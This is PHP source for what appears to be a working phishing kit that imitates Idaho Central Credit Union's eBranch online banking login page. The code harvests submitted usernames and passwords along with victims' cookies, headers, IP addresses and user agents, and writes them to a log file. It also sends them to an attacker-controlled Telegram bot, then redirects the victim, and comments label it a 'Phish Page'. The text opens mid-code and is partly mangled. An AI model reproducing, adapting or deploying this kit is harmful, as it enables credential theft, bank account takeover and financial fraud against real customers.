“`php $value) { if (substr(isset($name) ? $name : ”, 0, 5) == ‘HTTP_’) { $headers[str_replace(‘ ‘, ‘-‘, ucwords(strtolower(str_replace(‘_’, ‘ ‘, substr($name, 5)))))] = $value; } } return $headers; } function compileLogEntry($type, $data, $ip, $userAgent, $headers, $cookies) { return “TIME: ” . date(“Y-m-d H:i:s”) . “\n” . “TYPE: ” . $type . “\n” . “IP: ” . $ip . “\n” . “USER_AGENT: ” . $userAgent . “\n” . “HEADERS: ” . json_encode($headers, JSON_PRETTY_PRINT) . “\n” . “RAW_COOKIES: ” . ($cookies ? $cookies : “N/A”) . “\n” . “PARSED_COOKIES: ” . json_encode($_COOKIE, JSON_PRETTY_PRINT) . “\n” . “DATA: ” . json_encode($data, JSON_PRETTY_PRINT) . “\n” . “——————————————————————-\n\n”; } function sendTelegramMessage($message, $botToken, $chatId) { if (empty($botToken) || empty($chatId) || !function_exists(‘curl_init’)) { error_log(“Telegram bot communication failed. Token/Chat ID missing or CURL not available.”); return; } $telegramApiUrl = “https://api.telegram.org/bot{$botToken}/sendMessage”; $payload = [ ‘chat_id’ => $chatId, ‘text’ => $message, ‘parse_mode’ => ‘HTML’ ]; if (function_exists(‘curl_init’)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $telegramApiUrl); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_exec($ch); curl_close($ch); } else { $options = [ ‘http’ => [ ‘method’ => ‘POST’, ‘header’ => ‘Content-type: application/x-www-form-urlencoded’, ‘content’ => http_build_query($payload), ‘timeout’ => 5 ], ‘ssl’ => [ ‘verify_peer’ => false, ‘verify_peer_name’ => false, ] ]; $context = stream_context_create($options); file_get_contents($telegramApiUrl, false, $context); } } // — Main Execution Logic — $captured_cookies_string = isset($_SERVER[‘HTTP_COOKIE’]) ? $_SERVER[‘HTTP_COOKIE’] : “NO_COOKIES_FOUND”; $all_headers = getHttpHeaders(); $client_ip = $_SERVER[‘REMOTE_ADDR’] ?? ‘UNKNOWN_IP’; $user_agent = $_SERVER[‘HTTP_USER_AGENT’] ?? ‘UNKNOWN_USER_AGENT’; if ($_SERVER[“REQUEST_METHOD”] == “POST”) { $username_field = htmlspecialchars($_POST[‘username’] ?? ”); $password_field = htmlspecialchars($_POST[‘password’] ?? ”); $captured_data = [ “username_submitted” => $username_field, “password_submitted” => $password_field ]; $log_entry = compileLogEntry(“CREDENTIAL_CAPTURE”, $captured_data, $client_ip, $user_agent, $all_headers, $captured_cookies_string); file_put_contents($logFile, $log_entry, FILE_APPEND); $telegram_message = “ICCU eBranch Credentials Captured!\n” . “==============================\n” . “Username: ” . $username_field . “\n” . “Password: ” . $password_field . “\n” . “IP: ” . $client_ip . “\n” . “User-Agent: ” . htmlentities($user_agent) . “\n” . “Cookies (Raw): \n
" . htmlentities($captured_cookies_string) . "
\n” . “Full Headers: \n
" . htmlentities(json_encode($all_headers, JSON_PRETTY_PRINT)) . "
“; $telegram_message = str_replace(array(‘<', '>‘), array(‘<‘, ‘>’), $telegram_message); $telegram_message = str_replace(array(‘<b>’, ‘</b>’, ‘<i>’, ‘</i>’, ‘<pre>’, ‘</pre>’), array(‘‘, ‘‘, ‘‘, ‘
', '
‘), $telegram_message); sendTelegramMessage($telegram_message, $telegramBotToken, $telegramChatId); header(“Location: ” . $redirectUrl); exit(); } else { $initial_access_data = [“message” => “Initial page access, preparing ICCU eBranch capture.”]; $log_entry = compileLogEntry(“INITIAL_ACCESS”, $initial_access_data, $client_ip, $user_agent, $all_headers, $captured_cookies_string); file_put_contents($logFile, $log_entry, FILE_APPEND); // Optional: Send Initial Access Notification to Telegram /* $telegram_message_initial = “ICCU eBranch Phish Page Accessed!\n” . “IP: ” . $client_ip . “\n” . “User-Agent: ” . htmlentities($user_agent) . “\n” . “Cookies (Raw): \n
" . htmlentities($captured_cookies_string) . "
“; $telegram_message_initial = str_replace(array(‘<', '>‘), array(‘<‘, ‘>’), $telegram_message_initial); $telegram_message_initial = str_replace(array(‘<b>’, ‘</b>’, ‘<i>’, ‘</i>’, ‘<pre>’, ‘</pre>’), array(‘‘, ‘‘, ‘‘, ‘
', '
‘), $telegram_message_initial); sendTelegramMessage($telegram_message_initial, $telegramBotToken, $telegramChatId); */ ?> Online Banking – Idaho Central Credit Union

Online Banking Login

Forgot your password? Forgot your username?

New to Digital Banking? Enroll Today

SECURITY ALERT:

Idaho Central will never ask you for your private information, such as your Personal Identification Number (PIN), Passwords, Access Code or Social Security Number (SSN).

If you have any questions or concerns, please call us immediately at 1-800-456-5067.

“`